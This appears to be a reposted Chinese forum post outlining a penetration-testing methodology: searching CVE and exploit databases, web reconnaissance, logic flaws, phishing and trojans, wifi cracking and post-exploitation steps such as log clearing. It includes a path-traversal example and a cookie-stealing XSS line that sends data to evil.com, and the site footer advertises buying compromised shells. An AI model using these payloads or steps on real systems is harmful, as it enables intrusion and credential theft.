渗透思路总结(非原创)


发布人:1271233221分类:网络安全浏览量:856发布时间:2018-06-11


渗透测试思路总结


《Metasploit渗透测试魔鬼训练营》等书已经对渗透测试的步骤流程划分得比较合理透彻了,只是自己体会在最为关键的从漏洞分析到渗透攻击这一步很难跨越。


因为按书中漏洞分析基本只有openvas等漏洞扫描器一条途径,漏洞利用只有Metasploit搜索一条途径;而漏洞扫描器扫出漏洞Metasploit中又正好有利用模块更是少之又少。


所以总感觉在多次通读该类书藉之后仍总感觉不得要领----要对一台给定的主机进行渗透,到底该如何着手。


下文是自己近一年多工作来的经验总结,主要是总结从漏洞分析到渗透攻击有哪些路径。


 


一、渗透操作系统


操作系统类漏洞一般都是大神们通过代码审计/逆向分析挖掘的漏洞,这需要高深的知识储备,对于一般的渗透而言利用已知漏洞即可。


1.1 获取正在监听端口的软件及该软件的版本号


 比如假设我们探测到8080端口为tomcat监听,版本号为8.5.14




 


1.2 搜索已有漏洞库,获取该软件及相应版本存在的漏洞列表


1.2.1 搜索CVE漏洞库,获取软件及相应版本存在的漏洞列表


http://www.cvedetails.com/version-search.php






这样我们就找到了tomcat 8.5.14版本存在的几个漏洞,后边以CVE-2017-12617为例


 


1.3 查看CVE具体信息


1.3.1 在cvedetails查看CVE具体信息


https://www.cvedetails.com/






 


1.3.2 在mitre查看CVE具体信息


http://cve.mitre.org/cve/search_cve_list.html


 




 


1.4 通过CVE查找EXP


1.4.1 在上边的cvedetails或mitre结果中拉到后边的References For CVE-xxx参考区里边有可能有exp链接






在上边已经可看到CVE-2017-12617对应的exploit-db和metasploit中的exp链接


 


1.4.2 在上边的cvedetails中直接点击搜索twitter/youtube/google


 




 


1.4.3 到metasploit数据库查找exp(msfconsole中search可能需要更新)


https://www.rapid7.com/db/modules/




 


1.4.4 到exploit数据库查找exp(不爬墙验证码一般出不来,那只能kali中searchsploit了)


https://www.exploit-db.com/search/




 


1.4.5 到github查找exp


https://github.com/search






 


1.4.6 openvas等系统漏洞扫描器


 


二、渗透web系统


web漏洞可分为业务逻辑漏洞和技术型漏洞两大类


web业务逻辑漏洞(所有功能操作,分析数据包交互逻辑以挖掘)


web技术型漏洞(暴破、SQL、XSS、CSRF、文件上传,awvs、wmap、w3af探测,手工利用)


 


2.1 信息收集(信收集的目地是锁定可用手段的范围)


网站真实IP--站长、nslookup、dig、www.cz88.net、tcroute


操作系统--TTL、index.PHP、访问不存在页面


网站语言--index等一众页面的后缀、respone包头


服务器--访问不存在页面、respone包头、whatweb


数据库--注入报错、telnet端口


主机端口--Nmap、arp_swwep、portscan


子域名查询--subdomain.chaxun.la


 


2.2 业务漏洞检测(各项业务都可攻击)


注册登录--弱密码、用户名枚举、短信重放


多次请求后被限制--不是针对用户名都可绕过


忘记密码--非本机验证码重放轰炸或暴破该验证码以重置;重置密码数握包中将号码改为他人


越过验证页面(数据包)直接操作页面(数据包)


查询功能--增减ID、改号码尝试水平越权


商品购买--价格修改


APP客户端会较web前端承担更多的逻辑比如验证跳转


抽奖次数本地修改


 


2.3 技术型漏洞检测


网站CMS--Power By、site+“CMS”;百度”xxx CMS漏洞“


敏感目录--inurl、御剑、dirb、nikto、awvs


漏洞挖掘--手工探测、wmap、w3af、nikto、awvs


漏洞利用--手工利用、sqlmap、searchexploit


伪静态--xxx.com/id/189.html->xxx.com?id=189


动态重定向--消息头重定向注入


文件下载:http://host/1.ipg/../../..//etc/password


URL#号--location.hash:http://www.foo.com/info.html#new


%20Image().src="http://www.evil.com/steal.php?c="+escape(document.cookie)


sql手工注入总结、XSS绕过总结、文件上传总结


 


三、其他类型渗透


3.1 客户端攻击


原理:利用软件的解析错误溢出执行装于文件中的exp


browser_autopwd模块构造网页自劝溢出攻击浏览器


ms10_087模块配置生成畸型文件弄到靶机打开


adobe_cooltype_sing生成畸型pdf攻击adobe


 


3.2 社会工程学


利用msfvenom生成各平台的包含了payload的木马


利用setoolkit制作钩鱼网站或有畸形文件的邮件


UitraISO+Hacksaw制作木马启动盘


拿着姓名/手机/邮箱等到各网站搜一圈看注册信息


 


3.5 无线安全


aircrack-ng破解wifi密码


Airmom-ng假冒ap,并利用karma架设假冒服务


 


3.6 后渗透攻击


所谓后渗透就是拿到主机shell后,提权/清除日志/增加更稳定后门/内网渗透等工作


Meterpreter可以理解为是windows的cmd,linux的shell


日志--C:\Windows\System32\winevt\Logs、/var/log



有兴趣学习的可以联系QQ:1271233221

交流群:729731220

谢谢http://www.hac-ker.net/平台支持

被黑站点统计 - 文章版权1、本主题所有言论和图片纯属会员个人意见,与本文章立场无关
2、本站所有主题由该文章作者发表,该文章作者与被黑站点统计享有文章相关版权
3、其他单位或个人使用、转载或引用本文时必须同时征得该文章作者和被黑站点统计的同意
4、文章作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
7、被黑站点统计管理员有权不事先通知发贴者而删除本文

高价收shell QQ:385880567

1271233221  的文章


微信公众号

微信公众号


Copyright © 2012-2022被黑网站统计系统All Rights Reserved
页面总访问量:19289007(PV) 页面执行时间:42.383(MS)
  • xml
  • 网站地图